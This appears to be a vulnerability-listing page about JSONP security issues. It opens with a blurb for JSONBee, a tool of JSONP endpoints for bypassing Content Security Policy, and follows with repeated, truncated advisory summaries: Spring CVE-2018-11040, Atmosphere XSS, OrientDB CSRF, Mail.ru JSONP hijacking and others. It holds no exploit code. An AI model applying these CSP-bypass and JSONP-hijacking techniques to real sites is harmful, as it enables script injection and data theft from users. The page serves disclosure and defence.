JSONBee - A Ready To Use JSONP Endpoints/Payloads To Help Bypass Content Security Policy Of Different Websites

A ready to use JSONP endpoints to help bypass content security policy of different websites. The tool was presented during HackIT 2018 in Kiev. The presentation can be found here not sure why format of the slides is screwed :D:...

GHSA-28HP-FGCR-2R4H Cross-Site Scripting via JSONP

JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors...

Cross-Site Scripting via JSONP

JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors...

Mail.ru: JSONP hijacking

In this report researcher bypassed client-side protection against JSONP hijacking. Vulnerability allowed to disclose emails of logged in my.com users which visited malicious site...

OrientDB-Server vulnerable to Cross-Site Request Forgery

The JSONP endpoint in the Studio component in OrientDB Server Community Edition before 2.0.15 and 2.1.x before 2.1.1 does not properly restrict callback values, which allows remote attackers to conduct cross-site request forgery CSRF attacks, and obtain sensitive information, via a crafted HTTP...

CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

Moderate severity vulnerability that affects org.springframework:spring-core

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

GHSA-F26X-PR96-VW86 Moderate severity vulnerability that affects org.springframework:spring-core

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

Cross-site Scripting (XSS)

atmosphere-runtime is vulnerable to a cross-site scripting XSS attack. The library does not properly escape the JSONP callback parameter when passed to the server, allowing a malicious user to inject and execute arbitrary Javascript through it...

Rosetta Flash JSONP Vulnerability

WebApiContrib.Formatting.Jsonp is affected by the Rosetta flash JSONP vulnerability. The WriteToStreamAsync function in JsonpMediaTypeFormatter.cs allows printable characters from the callback parameter but is not able determine if the parameter contains a Flash file. An attacker will be able to...

Cross-Site Scripting (XSS)

atmosphere-runtime is vulnerable to cross-site scripting XSS. The JSONP transport method does not specify the content-type header when responding with the JSONP callback parameter, which causes web browsers to render the response when the parameter contains HTML and Javascript. This allows a remo...

Atmosphere 1.x / 2.x Cross Site Scripting Vulnerability

Async-IO.org Atmosphere suffers from a cross site scripting vulnerability. Versions affected include 2.4.0 through 2.4.28, 2.3.0 through 2.3.9, 2.2.0 through 2.2.12, 2.1.0 through 2.1.13, 2.0.0 through 2.0.11, and 1.0.0 through 1.0.20. COMPASS SECURITY ADVISORY...

Atmosphere 1.x / 2.x Cross Site Scripting

COMPASS SECURITY ADVISORY https://www.compass-security.com/research/advisories/ Product: Atmosphere 1 Vendor: Async-IO.org CSNC ID: CSNC-2018-023 Subject: Reflected Cross-Site Scripting XSS Risk: High Effect: Remotely exploitable Author: Lukasz D. [email protected] Date: 13.08.2018...

VulnCheck KEV: CVE-2017-8877

ASUS RT-AC and RT-N devices with firmware through 3.0.0.4.380.7378 allow JSONP Information Disclosure such as the SSID...

DEBIAN-CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

Cross site scripting

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

UBUNTU-CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...

CVE-2018-11040

Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP JSON with Padding through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser...